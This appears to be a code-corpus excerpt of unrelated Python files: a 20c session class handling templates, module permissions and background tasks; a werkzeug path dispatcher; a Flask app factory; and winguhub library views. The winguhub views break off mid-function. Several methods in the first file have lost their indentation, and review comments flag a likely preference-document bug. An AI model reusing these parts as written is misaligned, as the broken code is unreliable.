            # first check in the brand location
            if self.brand and os.path.exists(os.path.join(self.brand.get("dir"), "tmpl", namespace, name)):
                tmpl_path=os.path.join(
                    self.brand.get("dir"), "tmpl", namespace
                )

            # then check in the module template cache; a list entry means
            # "render from file path", a string entry is inline code
            elif self.app.templates.has_key("%s.%s" % (namespace, name)):
                tmpl_code = self.app.templates.get("%s.%s" % (namespace, name))
                if type(tmpl_code) == list:
                    tmpl_path = os.path.dirname(tmpl_code[0])
                    tmpl_code = None

        tmpl = None

        # standard variables available to every template
        variables.update({
            "brand_path" : self.brand_path,
            "app_version" : constants.version,
            "request" : self.get_bridge(request),
            "_" : self.locale._,
            "sf" : self.staticFileUrl,
            "sfb": self.staticFileUrlBrand
        })

        if not variables.has_key("headers"):
            variables["headers"] = []

        # instantiate the requested templating engine
        if tmpl_type == "cheetah":
            engine = tmpl_engine.engine.CheetahEngine(tmpl_dir=tmpl_path)
        elif tmpl_type == "jinja2":
            engine = tmpl_engine.engine.Jinja2Engine(tmpl_dir=tmpl_path)
        elif tmpl_type == "django":
            engine = tmpl_engine.engine.DjangoEngine(tmpl_dir=tmpl_path)
        else:
            raise Exception("Unknown templating engine: %s" % tmpl_type)

        if tmpl_code:
            return engine._render_str_to_str(tmpl_code, env=variables)
        elif tmpl_path:
            return engine._render(name, env=variables)
        else:
            # template not found
            raise Exception("Template not found: %s, %s" % (name, namespace))
#############################################################################
# set x-frame-options to deny loading this request in a frame. One reason
# to do this is to prevent clickjacking
def deny_frame(self, request):
headers = request.get("headers")
headers.extend([
("x-frame-options", "DENY"),
])
##############################################################################
    def reload_20c_module_perms(self):
        """
        Reload the module perms for this session from the module manager,
        then OR in the app-wide grant_permissions and the session-scoped
        billing-response namespace.
        """
        if self.app.module_manager:
            self.module_perms = self.app.module_manager.perms(self.auth_id)
            self.module_perms_structure = vt_session.perms_structure(self.module_perms)
        for namespace, level in self.app.grant_permissions.items():
            # skip namespaces the session already has at this level
            # NOTE(review): check_20c_module can return None (no module
            # manager fall-through), which would make this `& level` raise
            # -- confirm that path cannot be reached here
            if self.check_20c_module(namespace) & level:
                continue
            if self.module_perms.has_key(namespace):
                self.module_perms[namespace] = self.module_perms.get(namespace) | level
            else:
                self.module_perms[namespace] = level
        # every session may read its own billing responses
        self.module_perms["twentyc-billing.%s.response"%self.client_id] = constants.ACCESS_READ
##############################################################################
def module_control(self,app_doc):
if self.pref_manager:
return self.pref_manager.get(app_doc).get("module_control", {});
else:
return {}
##############################################################################
    def available_20c_modules(self, mobile=False):
        """
        Return a list of {name, version, status} dicts for the modules this
        session has access to, in javascript load order.  With mobile=True
        only mobile-capable modules are included.
        """
        r = [];
        # preference document holding per-module enable/disable flags
        # NOTE(review): the non-mobile branch reads the "mobile" document
        # -- confirm this is intended and not a typo for another doc name
        if mobile:
            app_doc = "mobile_app"
        else:
            app_doc = "mobile"
        module_control = self.module_control(app_doc)
        for i in self.app.module_js_load_order:
            mod = self.app.module_status.get(i,{})
            if mobile and not mod.get("mobile"):
                continue;
            # globally disabled modules report status 0; otherwise use the
            # user's module_control flag (default enabled)
            if not mod.get("status"):
                status = 0
            else:
                status = int(module_control.get(i,1))
            if self.check_20c_module(i):
                r.append({
                    "name" : i,
                    "version" : mod.get("version"),
                    "status" : status
                })
        return r
##############################################################################
    def check_20c_module(self, name, ambiguous=False):
        """
        Check if the session has access to the specified 20c module and
        return its permission bitmask (0x01 read, 0x02 write, 0x04 ...).

        NOTE(review): falls through returning None when no condition
        matches and no module_manager is set -- callers treating the
        result as an int should confirm that path is unreachable.
        """
        # modules with access_level 0 are open to everyone (read|write)
        if self.app.module_status.has_key(name):
            if self.app.module_status.get(name,{}).get("access_level",0) == 0:
                return 3
        # app-wide grants
        if self.app.grant_permissions.has_key(name):
            return self.app.grant_permissions.get(name)
        # the session's own private namespace: full access
        if re.match("^__U\.%s\..+" % self.client_id, name):
            return 0x01|0x02|0x04
        # task result namespaces: readable only for tasks this session owns
        if re.match("^__vodka-task-result\..+", name):
            task_id = name.split(".")[1]
            if task_id in self.tasks:
                return 0x01
            else:
                return 0
        # otherwise defer to the module manager's permission check
        if self.app.module_manager:
            return self.app.module_manager.perms_check(self.module_perms, name, ambiguous=ambiguous)
##############################################################################
def reload_20c_module(self, name, version):
"""
Send remote code execution to client to reload the specified module
name <str> name of the module to reload
"""
self.rce_require(
"reload.%s" % name,
"\n".join([
"TwentyC.Modules.Load('%s', '%s');" % (name,version)
])
)
##############################################################################
    def unload_20c_module(self, name):
        """
        Queue client-side javascript (via the RCE mechanism) that unloads
        the specified module, first recursively unloading every module
        that depends on it.

        name <str> name of the module to unload

        NOTE(review): the recursion assumes the dependency graph is
        acyclic -- a cycle would recurse forever.
        """
        #find all modules that depend on this module.
        modules = self.app.update_modules()
        for mod_name,mod_status in modules.items():
            if name in mod_status.get("dependencies",[]):
                self.unload_20c_module(mod_name)

        # unload tools + module unload call + optional module unload hook
        self.rce_require(
            "unload.%s" % name,
            self.app.unload_tools_code+"\n"+
            "TwentyC.Modules.Unload('%s');\n" % name+
            (self.app.module_javascript_component(name, comp="unload.js") or "")
        )
##############################################################################
    def task_run(self, moduleName, taskName, params={}, target="download", filename=None, limitResult=0, source="session"):
        """
        Start a background task for this session if it has access to the
        module and is under both the per-type and total task capacity.
        Returns the new task id, or implicitly None when the module access
        check fails.

        NOTE(review): params={} is a mutable default -- confirm callers
        always pass their own dict (it is forwarded, not mutated here).
        """
        if self.check_20c_module(moduleName):
            taskType ="%s.%s" % (moduleName, taskName)

            # make sure session is not at task capacity
            maxCap = TASK_CAPACITY.get(taskType, 1)
            totCap = self.app.taskSessionCap

            wSame, fSame = self.task_status(taskType)
            wTotal, fTotal = self.task_status()

            if wSame >= maxCap:
                raise Exception("Please wait for the current '%s' task(s) to finish" % taskType)
            if wTotal >= totCap:
                raise Exception("Please wait for one of your other background tasks to finish")

            # task ids are prefixed with the first 6 chars of the client id
            id_prefix = self.client_id[:6]

            self.app.log.info("Session %s... starting task: %s.%s %s" % (
                id_prefix,
                moduleName,
                taskName,
                params
            ))

            id, p = self.app.task_run(
                moduleName,
                taskName,
                id=self.client_id[:6],
                ses=self,
                target=target,
                params=params,
                filename=filename,
                limitResult=limitResult,
                source=source
            )

            # remember ownership so task_status/task_cancel can find it
            self.tasks.append(id)

            return id
##############################################################################
    def task_cancel(self, id):
        """Cancel a background task owned by this session: mark its info
        record finished/canceled and terminate the worker.  Raises when
        the session does not own a task with that id."""
        if id not in self.tasks:
            raise Exception("Session doesn't own a task with that id")
        info = self.app.task_info(id)
        info.update(end_t=time.time(), status=task.FINISHED, progress="Canceled", retrieved=2)
        self.app.task_terminate(id)
##############################################################################
def task_status(self, type=None):
working = 0
finished = 0
for id in self.tasks:
t = self.app.tasks.get(id)
if not t or (type and t.get("info",{}).get("type") != type):
continue
status = t.get("info",{}).get("status")
if status == task.FINISHED:
finished += 1
else:
working += 1
return (working, finished)
##############################################################################
    def update_index(self, name, index, rev=None):
        """
        Track the rpc/update index `index` under `name` and return what
        changed since the previous call.

        list index : returns the accumulated dropped items and maintains
                     an (a, b) revision pair in update_index_rev
        dict index : returns (updated, dropped) dicts
        None       : ignored

        NOTE(review): the dict branch never writes `index` back into
        update_index_map, so `prev` is always the stored default -- confirm
        this is intended.
        """
        if type(index) == types.NoneType:
            return
        # previous value defaults to an empty container of the same type
        prev = self.update_index_map.get(name, type(index)())
        if type(prev) == list:
            # items that disappeared since last time, merged with any
            # previously recorded drops
            diff = list(set(prev) - set(index))
            rv = self.update_index_dropped[name] = list(set(diff + self.update_index_dropped.get(name,[])))
            self.update_index_map[name] = index
            crev_a, crev_b = self.update_index_rev.get(name, (0,0))
            # a newer major revision resets the dropped list
            if rev > crev_a:
                self.update_index_dropped[name] = []
                crev_a = rev
            # same major revision with new drops bumps the minor revision
            if rev == crev_b and rv:
                if not self.update_index_rev.has_key(name):
                    crev_a = 0
                    crev_b = 1
                else:
                    crev_b += 1
            self.update_index_rev[name] = (crev_a, crev_b)
            return rv
        elif type(prev) == dict:
            dropped = {}
            updated = {}
            # keys that are new or changed
            for k,v in index.items():
                if prev.get(k) != v:
                    updated[k] = v
            # keys that vanished
            for k,v in prev.items():
                if not index.has_key(k):
                    dropped[k] = v
            diff = (updated, dropped)
            return diff
################################################################################
################################################################################
| StarcoderdataPython |
3472386 | <reponame>ASHISHKUMAR2411/Programming-CookBook
from threading import Lock
from werkzeug.wsgi import pop_path_info, peek_path_info
from myapplication import create_app, default_app, get_user_for_prefix
class PathDispatcher(object):
    """WSGI middleware that dispatches by the first path segment.

    Applications are created on demand via create_app(prefix) and cached;
    prefixes for which create_app returns None fall back to default_app.
    """

    def __init__(self, default_app, create_app):
        self.default_app = default_app
        self.create_app = create_app
        self.lock = Lock()
        self.instances = {}

    def get_application(self, prefix):
        """Return the cached app for `prefix`, creating it if needed."""
        with self.lock:
            app = self.instances.get(prefix)
            if app is None:
                app = self.create_app(prefix)
                if app is not None:
                    self.instances[prefix] = app
            return app

    def __call__(self, environ, start_response):
        app = self.get_application(peek_path_info(environ))
        if app is None:
            app = self.default_app
        else:
            # consume the prefix segment before delegating
            pop_path_info(environ)
        return app(environ, start_response)
def make_app(prefix):
    """Factory for PathDispatcher: create an app for the user owning
    `prefix`, or return None for unknown users."""
    user = get_user_for_prefix(prefix)
    return create_app(user) if user is not None else None
application = PathDispatcher(default_app, make_app) | StarcoderdataPython |
6701290 | """
Main app/routing file for Twitoff
"""
from os import getenv
from flask import Flask, render_template, request
from .models import DB, MIGRATE, User
from twitoff.routes.home_routes import home_routes
from twitoff.routes.prediction_routes import prediction_routes
from twitoff.routes.data_routes import data_routes
def create_app():
    """Application factory: configure Flask, the database and blueprints."""
    app = Flask(__name__)

    # Configuration comes from the environment with safe fallbacks.
    app.config.update(
        SECRET_KEY=getenv('SECRET_KEY', default="super secret"),
        SQLALCHEMY_DATABASE_URI=getenv('APP_DB_URL'),
        SQLALCHEMY_TRACK_MODIFICATIONS=False,
    )

    DB.init_app(app)
    MIGRATE.init_app(app, DB)

    for blueprint in (home_routes, prediction_routes, data_routes):
        app.register_blueprint(blueprint)

    return app
| StarcoderdataPython |
11383287 | <filename>winguhub/views/__init__.py<gh_stars>0
# encoding: utf-8
import os
import stat
import simplejson as json
import re
import sys
import urllib
import urllib2
import logging
import chardet
from types import FunctionType
from datetime import datetime
from math import ceil
from urllib import quote
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from django.contrib import messages
from django.contrib.sites.models import Site, RequestSite
from django.db import IntegrityError
from django.db.models import F
from django.http import HttpResponse, HttpResponseBadRequest, Http404, \
HttpResponseRedirect
from django.shortcuts import render_to_response, redirect
from django.template import Context, loader, RequestContext
from django.template.loader import render_to_string
from django.utils.hashcompat import md5_constructor
from django.utils.translation import ugettext as _
from django.utils import timezone
from django.utils.http import urlquote
from winguhub.auth.decorators import login_required
from winguhub.auth import login as auth_login
from winguhub.auth import authenticate
import seaserv
from seaserv import ccnet_rpc, ccnet_threaded_rpc, get_repos, get_emailusers, \
get_repo, get_commits, get_branches, is_valid_filename, remove_group_user,\
seafserv_threaded_rpc, seafserv_rpc, get_binding_peerids, is_repo_owner, \
get_personal_groups_by_user, is_inner_pub_repo, \
del_org_group_repo, get_personal_groups, web_get_access_token, remove_repo, \
get_group, get_shared_groups_by_repo, is_group_user, check_permission, \
list_personal_shared_repos, is_org_group, get_org_id_by_group, is_org_repo,\
list_inner_pub_repos, get_org_groups_by_repo, is_org_repo_owner, \
get_org_repo_owner, is_passwd_set, get_file_size, check_quota, edit_repo,\
get_related_users_by_repo, get_related_users_by_org_repo, \
get_session_info, get_group_repoids, get_repo_owner, get_file_id_by_path, \
set_repo_history_limit, \
get_commit, MAX_DOWNLOAD_DIR_SIZE, CALC_SHARE_USAGE, count_emailusers, \
count_inner_pub_repos, unset_inner_pub_repo, get_user_quota_usage, \
get_user_share_usage, send_message
from seaserv import wingufile_api
from pysearpc import SearpcError
from winguhub.base.accounts import User
from winguhub.base.decorators import sys_staff_required
from winguhub.base.models import UuidObjidMap, InnerPubMsg, InnerPubMsgReply
from winguhub.contacts.models import Contact
from winguhub.contacts.signals import mail_sended
from winguhub.group.forms import MessageForm, MessageReplyForm
from winguhub.group.models import GroupMessage, MessageAttachment
from winguhub.group.signals import grpmsg_added
from winguhub.notifications.models import UserNotification
from winguhub.profile.models import Profile
from winguhub.share.models import FileShare, PrivateFileDirShare
from winguhub.forms import AddUserForm, RepoCreateForm, \
RepoPassowrdForm, SharedRepoCreateForm,\
SetUserQuotaForm, RepoSettingForm
from winguhub.signals import repo_created, repo_deleted
from winguhub.utils import render_permission_error, render_error, list_to_string, \
get_httpserver_root, get_ccnetapplet_root, \
gen_dir_share_link, gen_file_share_link, get_repo_last_modify, \
calculate_repos_last_modify, get_file_type_and_ext, get_user_repos, \
EMPTY_SHA1, normalize_file_path, \
get_file_revision_id_size, get_ccnet_server_addr_port, \
gen_file_get_url, string2list, MAX_INT, IS_EMAIL_CONFIGURED, \
gen_file_upload_url, check_and_get_org_by_repo, \
get_file_contributors, EVENTS_ENABLED, get_user_events, get_org_user_events, \
get_starred_files, star_file, unstar_file, is_file_starred, get_dir_starred_files, \
get_dir_files_last_modified, show_delete_days, \
TRAFFIC_STATS_ENABLED, get_user_traffic_stat
from winguhub.utils.paginator import get_page_range
from winguhub.utils import HAS_OFFICE_CONVERTER
if HAS_OFFICE_CONVERTER:
from winguhub.utils import prepare_converted_html, OFFICE_PREVIEW_MAX_SIZE, OFFICE_PREVIEW_MAX_PAGES
import winguhub.settings as settings
from winguhub.settings import FILE_PREVIEW_MAX_SIZE, INIT_PASSWD, USE_PDFJS, FILE_ENCODING_LIST, \
FILE_ENCODING_TRY_LIST, SEND_EMAIL_ON_ADDING_SYSTEM_MEMBER, SEND_EMAIL_ON_RESETTING_USER_PASSWD, \
ENABLE_SUB_LIBRARY
# Get an instance of a logger
logger = logging.getLogger(__name__)
@login_required
def root(request):
return HttpResponseRedirect(reverse(myhome))
def validate_owner(request, repo_id):
    """Return True if the requesting user is the owner of *repo_id*."""
    return bool(is_repo_owner(request.user.username, repo_id))
def is_registered_user(email):
    """Return True if *email* belongs to a registered user account."""
    try:
        user = User.objects.get(email=email)
    except User.DoesNotExist:
        return False
    return bool(user)
def access_to_repo(request, repo_id, repo_ap=None):
    """
    Check whether the requesting user may view directory entries of a repo.
    Owners and users the repo is shared with are allowed; anonymous visitors
    are allowed only when they carry an 'anontoken' cookie.

    NOTE: This function is deprecated, use `get_user_permission`.
    """
    if request.user.is_authenticated():
        return bool(check_permission(repo_id, request.user.username))
    return bool(request.COOKIES.get('anontoken', None))
def get_user_permission(request, repo_id):
    """Return the requesting user's permission on the repo.

    Authenticated users get whatever ``check_permission`` reports;
    anonymous visitors get read-only ('r') when they carry an 'anontoken'
    cookie, otherwise the empty string.
    """
    if not request.user.is_authenticated():
        anon_token = request.COOKIES.get('anontoken', None)
        return 'r' if anon_token else ''
    return check_permission(repo_id, request.user.username)
def get_file_access_permission(repo_id, path, username):
    """Check whether *username* may view the file at *path* in *repo_id*.

    1. check whether this file is private shared;
    2. if not, check whether any ancestor directory is private shared.
    Returns the share's permission string, or None when nothing matches.
    """
    direct_share = PrivateFileDirShare.objects.get_private_share_in_file(
        username, repo_id, path)
    if direct_share is not None:
        return direct_share.permission

    dir_shares = PrivateFileDirShare.objects.list_private_share_in_dirs_by_user_and_repo(username, repo_id)
    for share in dir_shares:
        if path.startswith(share.path):
            return share.permission
    return None
def get_repo_access_permission(repo_id, username):
    # Thin wrapper over the wingufile RPC; returns whatever permission value
    # the API reports (e.g. 'rw' is compared against elsewhere in this file —
    # exact value set defined by wingufile_api, verify there).
    return wingufile_api.check_repo_access_permission(repo_id, username)
def gen_path_link(path, repo_name):
    """Build the breadcrumb for *path* on a repo page.

    Returns pairs of (display name, link target). When *repo_name* is
    non-empty it becomes the first crumb, linked to the repo root ('/').
    """
    if path and not path.endswith('/'):
        path += '/'

    names, links = [], []
    if path and path != '/':
        names = path[1:-1].split('/')
        # Each crumb links to the cumulative path up to and including it.
        for depth in range(1, len(names) + 1):
            links.append('/' + '/'.join(names[:depth]))
    if repo_name:
        names.insert(0, repo_name)
        links.insert(0, '/')

    return zip(names, links)
def get_repo_dirents(request, repo_id, commit, path, offset=-1, limit=-1):
    """List the entries of directory *path* at *commit* of a repo.

    Returns (file_list, dir_list) when limit == -1, otherwise
    (file_list, dir_list, dirent_more), where dirent_more tells whether
    more entries exist beyond the requested page.
    """
    dir_list = []
    file_list = []
    dirent_more = False
    if commit.root_id == EMPTY_SHA1:
        # Empty library: nothing to list; keep the return shape consistent.
        return ([], []) if limit == -1 else ([], [], False)
    else:
        try:
            if limit == -1:
                dirs = wingufile_api.list_dir_by_commit_and_path(commit.id, path, offset, limit)
            else:
                # Ask for one extra entry to detect whether a next page exists.
                dirs = wingufile_api.list_dir_by_commit_and_path(commit.id, path, offset, limit + 1)
                if len(dirs) == limit + 1:
                    dirs = dirs[:limit]
                    dirent_more = True
        except SearpcError, e:
            raise Http404
            # return render_error(self.request, e.msg)

        org_id = -1
        if hasattr(request.user, 'org') and request.user.org:
            org_id = request.user.org['org_id']
        starred_files = get_dir_starred_files(request.user.username, repo_id, path, org_id)
        last_modified_info = get_dir_files_last_modified(repo_id, path)

        # Share links created by the current user, used to decorate entries.
        fileshares = FileShare.objects.filter(repo_id=repo_id).filter(username=request.user.username)

        for dirent in dirs:
            dirent.last_modified = last_modified_info.get(dirent.obj_name, 0)
            dirent.sharelink = ''
            if stat.S_ISDIR(dirent.props.mode):
                # Directory share paths are stored with a trailing slash.
                dpath = os.path.join(path, dirent.obj_name)
                if dpath[-1] != '/':
                    dpath += '/'
                for share in fileshares:
                    if dpath == share.path:
                        dirent.sharelink = gen_dir_share_link(share.token)
                        dirent.sharetoken = share.token
                        break
                dir_list.append(dirent)
            else:
                file_list.append(dirent)
                dirent.file_size = get_file_size(dirent.obj_id)
                dirent.starred = False
                fpath = os.path.join(path, dirent.obj_name)
                if fpath in starred_files:
                    dirent.starred = True
                for share in fileshares:
                    if fpath == share.path:
                        dirent.sharelink = gen_file_share_link(share.token)
                        dirent.sharetoken = share.token
                        break
        # Case-insensitive alphabetical order (Python 2 cmp-style sort).
        dir_list.sort(lambda x, y : cmp(x.obj_name.lower(),
                                        y.obj_name.lower()))
        file_list.sort(lambda x, y : cmp(x.obj_name.lower(),
                                         y.obj_name.lower()))
        if limit == -1:
            return (file_list, dir_list)
        else:
            return (file_list, dir_list, dirent_more)
def get_unencry_rw_repos_by_user(username):
    """Get all unencrypted repos the user can read and write.

    Each returned repo object gets a ``has_subdir`` attribute telling
    whether its root contains at least one directory.
    """
    def check_has_subdir(repo):
        # True if the repo's latest commit contains a directory at its root.
        latest_commit = seaserv.get_commits(repo.id, 0, 1)[0]
        if not latest_commit:
            return False
        if latest_commit.root_id == EMPTY_SHA1:
            return False

        try:
            dirs = wingufile_api.list_dir_by_commit_and_path(latest_commit.id, '/')
        except Exception, e:
            logger.error(e)
            return False
        else:
            for dirent in dirs:
                if stat.S_ISDIR(dirent.props.mode):
                    return True
            return False

    def has_repo(repos, repo):
        # Membership test by repo id, to avoid duplicates across sources.
        for r in repos:
            if repo.id == r.id:
                return True
        return False

    owned_repos, shared_repos, groups_repos, public_repos = get_user_repos(username)

    accessible_repos = []

    for r in owned_repos:
        # Owned repos are always writable; only skip encrypted ones.
        if not has_repo(accessible_repos, r) and not r.encrypted:
            r.has_subdir = check_has_subdir(r)
            accessible_repos.append(r)

    for r in shared_repos + public_repos:
        # For compatibility with different field names in Repo and
        # SharedRepo objects.
        r.id = r.repo_id
        r.name = r.repo_name
        r.desc = r.repo_desc
        if not has_repo(accessible_repos, r) and not r.encrypted:
            if wingufile_api.check_repo_access_permission(r.id, username) == 'rw':
                r.has_subdir = check_has_subdir(r)
                accessible_repos.append(r)

    for r in groups_repos:
        if not has_repo(accessible_repos, r) and not r.encrypted :
            if wingufile_api.check_repo_access_permission(r.id, username) == 'rw':
                r.has_subdir = check_has_subdir(r)
                accessible_repos.append(r)

    return accessible_repos
def render_recycle_root(request, repo_id):
    """Render the top level of a library's trash (recently deleted entries)."""
    repo = get_repo(repo_id)
    if not repo:
        raise Http404

    # How many days of deleted history to show (site/request configurable).
    days = show_delete_days(request)

    try:
        deleted_entries = seafserv_threaded_rpc.get_deleted(repo_id, days)
    except:
        deleted_entries = []

    dir_list = []
    file_list = []
    for dirent in deleted_entries:
        if stat.S_ISDIR(dirent.mode):
            dir_list.append(dirent)
        else:
            file_list.append(dirent)

    # Entries sort by deletion time in descending order.
    dir_list.sort(lambda x, y : cmp(y.delete_time,
                                    x.delete_time))
    file_list.sort(lambda x, y : cmp(y.delete_time,
                                     x.delete_time))

    # Full-text search is only offered for unencrypted libraries.
    search_repo_id = None
    if not repo.encrypted:
        search_repo_id = repo.id

    return render_to_response('repo_recycle_view.html', {
            'show_recycle_root': True,
            'repo': repo,
            'dir_list': dir_list,
            'file_list': file_list,
            'days': days,
            'search_repo_id': search_repo_id,
            }, context_instance=RequestContext(request))
def render_recycle_dir(request, repo_id, commit_id):
    """Render a subdirectory of the trash, as it existed at *commit_id*.

    ``base`` (the deleted entry's original parent directory) and ``p``
    (the path browsed below it) both come from the query string.
    """
    basedir = request.GET.get('base', '')
    path = request.GET.get('p', '')
    if not basedir or not path:
        # Without both parameters, fall back to the trash top level.
        return render_recycle_root(request, repo_id)

    # Normalize: basedir is absolute, path ends with a slash.
    if basedir[0] != '/':
        basedir = '/' + basedir
    if path[-1] != '/':
        path += '/'

    repo = get_repo(repo_id)
    if not repo:
        raise Http404
    commit = seafserv_threaded_rpc.get_commit(commit_id)
    if not commit:
        raise Http404
    zipped = gen_path_link(path, '')
    file_list, dir_list = get_repo_dirents(request, repo_id, commit, basedir + path)

    days = show_delete_days(request)

    # Full-text search is only offered for unencrypted libraries.
    search_repo_id = None
    if not repo.encrypted:
        search_repo_id = repo.id

    return render_to_response('repo_recycle_view.html', {
            'show_recycle_root': False,
            'repo': repo,
            'zipped': zipped,
            'dir_list': dir_list,
            'file_list': file_list,
            'commit_id': commit_id,
            'basedir': basedir,
            'path': path,
            'days': days,
            'search_repo_id': search_repo_id,
            }, context_instance=RequestContext(request))
@login_required
def repo_recycle_view(request, repo_id):
    """Entry point for a library's trash: dispatch to the root listing or,
    when a commit id is supplied, to a deleted subdirectory view."""
    if get_user_permission(request, repo_id) != 'rw':
        return render_permission_error(request, _(u'Unable to view recycle page'))

    commit_id = request.GET.get('commit_id', '')
    if commit_id:
        return render_recycle_dir(request, repo_id, commit_id)
    return render_recycle_root(request, repo_id)
@login_required
def repo_save_settings(request):
    """AJAX endpoint: save a library's name/description and history limit.

    Only the repo owner (or org repo owner) may change settings. Responds
    with JSON; failures use HTTP 400/403/500 depending on the cause.
    """
    if request.method != 'POST':
        raise Http404

    username = request.user.username
    content_type = 'application/json; charset=utf-8'

    form = RepoSettingForm(request.POST)
    if form.is_valid():
        repo_id = form.cleaned_data['repo_id']
        repo_name = form.cleaned_data['repo_name']
        repo_desc = form.cleaned_data['repo_desc']
        days = form.cleaned_data['days']

        repo = get_repo(repo_id)
        if not repo:
            err_msg = _(u'Library does not exist.')
            return HttpResponse(json.dumps({'error': err_msg}),
                                status=400, content_type=content_type)

        # check permission
        if request.user.org:
            is_owner = True if is_org_repo_owner(
                request.user.org['org_id'], repo_id, username) else False
        else:
            is_owner = True if is_repo_owner(username, repo_id) else False
        if not is_owner:
            err_msg = _(u'You do not have permission to perform this action.')
            return HttpResponse(json.dumps({'error': err_msg}),
                                status=403, content_type=content_type)

        # Edit library info (name, description) only when something changed.
        if repo.name != repo_name or repo.desc != repo_desc:
            if not edit_repo(repo_id, repo_name, repo_desc, username):
                err_msg = _(u'Failed to edit library information.')
                return HttpResponse(json.dumps({'error': err_msg}),
                                    status=500, content_type=content_type)

        # set library history limit (None means "leave unchanged")
        if days != None:
            res = set_repo_history_limit(repo_id, days)
            if res != 0:
                return HttpResponse(json.dumps({'error': _(u'Failed to save settings on server')}),
                                    status=400, content_type=content_type)

        messages.success(request, _(u'Settings saved.'))
        return HttpResponse(json.dumps({'success': True}),
                            content_type=content_type)
    else:
        # Report only the first validation error.
        return HttpResponse(json.dumps({'error': str(form.errors.values()[0])}),
                            status=400, content_type=content_type)
def upload_error_msg (code):
    """Translate an upload error *code* into a user-facing message.

    Unknown codes map to a generic internal-server-error message.
    """
    known_errors = {
        0: _(u'Filename contains invalid character'),
        1: _(u'Duplicated filename'),
        2: _(u'File does not exist'),
        3: _(u'File size surpasses the limit'),
        4: _(u'The space of owner is used up, upload failed'),
        5: _(u'An error occurs during file transfer'),
    }
    return known_errors.get(code, _(u'Internal Server Error'))
def upload_file_error(request, repo_id):
    """Render an error page after a failed file upload.

    Query params: ``p`` (parent dir), ``fn`` (filename, optional) and
    ``err`` (numeric code, see ``upload_error_msg``).
    NOTE(review): only GET is handled; other methods implicitly return None.
    """
    if request.method == 'GET':
        repo = get_repo(repo_id)
        if not repo:
            raise Http404

        parent_dir = request.GET.get('p')
        filename = request.GET.get('fn', '')
        err = request.GET.get('err')
        if not parent_dir or not err:
            return render_error(request, _(u'Invalid url'))

        zipped = gen_path_link (parent_dir, repo.name)
        code = int(err)
        err_msg = upload_error_msg(code)

        return render_to_response('upload_file_error.html', {
                'repo': repo,
                'zipped': zipped,
                'filename': filename,
                'err_msg': err_msg,
                }, context_instance=RequestContext(request))
def update_file_error(request, repo_id):
    """Render an error page after a failed file update.

    Query params: ``p`` (target file path) and ``err`` (numeric code,
    see ``upload_error_msg``).
    NOTE(review): only GET is handled; other methods implicitly return None.
    """
    if request.method == 'GET':
        repo = get_repo(repo_id)
        if not repo:
            raise Http404

        target_file = request.GET.get('p')
        err = request.GET.get('err')
        if not target_file or not err:
            return render_error(request, _(u'Invalid url'))

        zipped = gen_path_link (target_file, repo.name)
        code = int(err)
        err_msg = upload_error_msg(code)

        return render_to_response('update_file_error.html', {
                'repo': repo,
                'zipped': zipped,
                'err_msg': err_msg,
                }, context_instance=RequestContext(request))
@login_required
def repo_history(request, repo_id):
    """
    List library modification histories (paginated commit log).
    """
    user_perm = get_user_permission(request, repo_id)
    if not user_perm:
        return render_permission_error(request, _(u'Unable to view library modification'))

    repo = get_repo(repo_id)
    if not repo:
        raise Http404

    # For an encrypted repo the user must have supplied its password in this
    # session before history can be browsed; otherwise bounce to the repo page.
    password_set = False
    if repo.props.encrypted:
        try:
            ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
            if ret == 1:
                password_set = True
        except SearpcError, e:
            return render_error(request, e.msg)

    if repo.props.encrypted and not password_set:
        return HttpResponseRedirect(reverse('repo', args=[repo_id]))

    # Pagination parameters from the query string, with safe fallbacks.
    try:
        current_page = int(request.GET.get('page', '1'))
        per_page = int(request.GET.get('per_page', '25'))
    except ValueError:
        current_page = 1
        per_page = 25

    # Fetch one extra commit to detect whether a next page exists.
    commits_all = get_commits(repo_id, per_page * (current_page -1),
                              per_page + 1)
    commits = commits_all[:per_page]

    if len(commits_all) == per_page + 1:
        page_next = True
    else:
        page_next = False

    # Full-text search is only offered for unencrypted libraries.
    search_repo_id = None
    if not repo.encrypted:
        search_repo_id = repo.id

    return render_to_response('repo_history.html', {
            "repo": repo,
            "commits": commits,
            'current_page': current_page,
            'prev_page': current_page-1,
            'next_page': current_page+1,
            'per_page': per_page,
            'page_next': page_next,
            'user_perm': user_perm,
            'search_repo_id': search_repo_id,
            }, context_instance=RequestContext(request))
@login_required
def repo_view_snapshot(request, repo_id):
    """List repo snapshots (paginated commit log, excluding the current commit).
    """
    if not access_to_repo(request, repo_id, ''):
        return render_permission_error(request, _(u'Unable to view library snapshots'))

    repo = get_repo(repo_id)
    if not repo:
        raise Http404

    # Encrypted repos require the password to be set in this session.
    password_set = False
    if repo.props.encrypted:
        try:
            ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
            if ret == 1:
                password_set = True
        except SearpcError, e:
            return render_error(request, e.msg)

    if repo.props.encrypted and not password_set:
        return HttpResponseRedirect(reverse('repo', args=[repo_id]))

    # Pagination parameters from the query string, with safe fallbacks.
    try:
        current_page = int(request.GET.get('page', '1'))
        per_page = int(request.GET.get('per_page', '25'))
    except ValueError:
        current_page = 1
        per_page = 25

    # don't show the current commit: offset is shifted by one, and one extra
    # commit is fetched to detect whether a next page exists.
    commits_all = get_commits(repo_id, per_page * (current_page -1) + 1,
                              per_page + 1)
    commits = commits_all[:per_page]

    if len(commits_all) == per_page + 1:
        page_next = True
    else:
        page_next = False

    # Full-text search is only offered for unencrypted libraries.
    search_repo_id = None
    if not repo.encrypted:
        search_repo_id = repo.id

    return render_to_response('repo_view_snapshot.html', {
            "repo": repo,
            "commits": commits,
            'current_page': current_page,
            'prev_page': current_page-1,
            'next_page': current_page+1,
            'per_page': per_page,
            'page_next': page_next,
            'search_repo_id': search_repo_id,
            }, context_instance=RequestContext(request))
@login_required
def repo_history_revert(request, repo_id):
    """Revert the library to the state of the commit given by ``commit_id``,
    then redirect back to the history page."""
    repo = get_repo(repo_id)
    if not repo:
        raise Http404

    if not access_to_repo(request, repo_id):
        return render_permission_error(request, _(u'You have no permission to restore library'))

    # Encrypted repos require the password to be set in this session.
    password_set = False
    if repo.props.encrypted:
        try:
            ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
            if ret == 1:
                password_set = True
        except SearpcError, e:
            return render_error(request, e.msg)

    if repo.props.encrypted and not password_set:
        return HttpResponseRedirect(reverse('repo', args=[repo_id]))

    commit_id = request.GET.get('commit_id', '')
    if not commit_id:
        return render_error(request, _(u'Please specify history ID'))

    try:
